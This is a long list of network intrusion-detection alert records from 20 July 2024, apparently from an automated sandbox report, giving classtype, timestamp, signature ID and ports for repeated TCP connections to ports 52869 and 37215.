                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2831300
                      Source Port:39930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2835222
                      Source Port:41120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.342520
                      SID:2025132
                      Source Port:50998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2831300
                      Source Port:57106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:44294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2025132
                      Source Port:54504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2829579
                      Source Port:57846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.464582
                      SID:2027339
                      Source Port:55284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2027339
                      Source Port:49408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:41054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2027339
                      Source Port:50232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.616106
                      SID:2027339
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.963204
                      SID:2027339
                      Source Port:57832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:33958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470289
                      SID:2027339
                      Source Port:51004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.946586
                      SID:2831300
                      Source Port:50674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2027339
                      Source Port:51360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:58974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.411596
                      SID:2027339
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2831300
                      Source Port:56586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.829339
                      SID:2835222
                      Source Port:36214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.587931
                      SID:2027339
                      Source Port:37492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.614211
                      SID:2025132
                      Source Port:50192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.175840
                      SID:2025132
                      Source Port:36732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2829579
                      Source Port:50684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:37080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.701555
                      SID:2831300
                      Source Port:36150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:32820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2831300
                      Source Port:41302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.367020
                      SID:2025132
                      Source Port:58364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:32932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.148720
                      SID:2027339
                      Source Port:35190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2831300
                      Source Port:43592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.711117
                      SID:2025132
                      Source Port:38450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:36.110698
                      SID:2027339
                      Source Port:53470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.572816
                      SID:2027339
                      Source Port:52670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.495332
                      SID:2025132
                      Source Port:52358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.193739
                      SID:2831300
                      Source Port:54484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2835222
                      Source Port:40974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.197096
                      SID:2027339
                      Source Port:36626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2027339
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2027339
                      Source Port:39698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.320091
                      SID:2831300
                      Source Port:46724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2025132
                      Source Port:34202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.236923
                      SID:2025132
                      Source Port:43176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2027339
                      Source Port:50150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2027339
                      Source Port:40334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2829579
                      Source Port:39896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2835222
                      Source Port:36458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2027339
                      Source Port:46108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.472911
                      SID:2831300
                      Source Port:41868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.935568
                      SID:2025132
                      Source Port:39836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.997058
                      SID:2025132
                      Source Port:57668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.059438
                      SID:2027339
                      Source Port:45334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.940936
                      SID:2025132
                      Source Port:39658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:32968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:34534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2027339
                      Source Port:33276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2027339
                      Source Port:34352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2027339
                      Source Port:55508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.949656
                      SID:2027339
                      Source Port:47112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2027339
                      Source Port:59862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.442724
                      SID:2027339
                      Source Port:48080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:39396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2027339
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2831300
                      Source Port:54572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2829579
                      Source Port:46950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.070304
                      SID:2027339
                      Source Port:43896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.746493
                      SID:2025132
                      Source Port:37748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2027339
                      Source Port:40540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:38008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2835222
                      Source Port:54764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2025132
                      Source Port:40958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.940214
                      SID:2025132
                      Source Port:51898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:41440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.835674
                      SID:2829579
                      Source Port:38296
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515826
                      SID:2831300
                      Source Port:52628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.054544
                      SID:2829579
                      Source Port:49004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2831300
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.663367
                      SID:2027339
                      Source Port:41904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2027339
                      Source Port:49234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.334968
                      SID:2831300
                      Source Port:52364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.267873
                      SID:2025132
                      Source Port:49592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.879176
                      SID:2831300
                      Source Port:53202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2025132
                      Source Port:50916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.469684
                      SID:2027339
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.489738
                      SID:2025132
                      Source Port:60886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2831300
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2025132
                      Source Port:44454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2025132
                      Source Port:35716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2025132
                      Source Port:56336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2027339
                      Source Port:55876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:60260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2027339
                      Source Port:35188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.515617
                      SID:2027339
                      Source Port:37716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:46322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2027339
                      Source Port:54372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:42676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809291
                      SID:2025132
                      Source Port:52122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2027339
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:46.927906
                      SID:2835222
                      Source Port:59510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.248418
                      SID:2027339
                      Source Port:53676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.397958
                      SID:2027339
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2835222
                      Source Port:44306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280800
                      SID:2025132
                      Source Port:41294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.874981
                      SID:2025132
                      Source Port:36192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.805828
                      SID:2829579
                      Source Port:48756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.191114
                      SID:2025132
                      Source Port:39098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2025132
                      Source Port:53984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440307
                      SID:2831300
                      Source Port:44810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:54408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.466712
                      SID:2835222
                      Source Port:53836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440434
                      SID:2027339
                      Source Port:46662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:41688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.169467
                      SID:2027339
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:58152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2835222
                      Source Port:33654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.307399
                      SID:2025132
                      Source Port:47046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.729283
                      SID:2025132
                      Source Port:52596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.578201
                      SID:2025132
                      Source Port:48650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.106264
                      SID:2025132
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:51388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2831300
                      Source Port:49504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2831300
                      Source Port:37104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2027339
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2027339
                      Source Port:39288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.631877
                      SID:2829579
                      Source Port:50168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.061851
                      SID:2027339
                      Source Port:35764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:60788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2829579
                      Source Port:43602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2027339
                      Source Port:55174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.305121
                      SID:2027339
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.654274
                      SID:2835222
                      Source Port:52518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:33732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2835222
                      Source Port:58160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2829579
                      Source Port:60758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2027339
                      Source Port:56170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2027339
                      Source Port:58644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.376181
                      SID:2831300
                      Source Port:53866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.826285
                      SID:2027339
                      Source Port:54732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.473848
                      SID:2027339
                      Source Port:33786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.141104
                      SID:2027339
                      Source Port:60572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:10.361471
                      SID:2025132
                      Source Port:37952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2025132
                      Source Port:57576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2831300
                      Source Port:55280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:52550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2027339
                      Source Port:58082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2835222
                      Source Port:37448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:05.182532
                      SID:2027339
                      Source Port:52464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2831300
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:39190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2027339
                      Source Port:40644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.909872
                      SID:2025132
                      Source Port:51224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:34432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2831300
                      Source Port:45590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.116146
                      SID:2027339
                      Source Port:34916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2831300
                      Source Port:48764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2027339
                      Source Port:59310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2027339
                      Source Port:51146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2835222
                      Source Port:53810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.662067
                      SID:2835222
                      Source Port:38868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.742007
                      SID:2025132
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.259152
                      SID:2027339
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2831300
                      Source Port:44172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2027339
                      Source Port:53158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.246846
                      SID:2831300
                      Source Port:36344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2027339
                      Source Port:46898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.441698
                      SID:2027339
                      Source Port:50284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2831300
                      Source Port:57250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2835222
                      Source Port:58666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2829579
                      Source Port:44548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.260416
                      SID:2025132
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2027339
                      Source Port:36304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2027339
                      Source Port:53442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2025132
                      Source Port:44538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.846905
                      SID:2027339
                      Source Port:40546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2027339
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.045663
                      SID:2027339
                      Source Port:45698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.133147
                      SID:2025132
                      Source Port:40900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
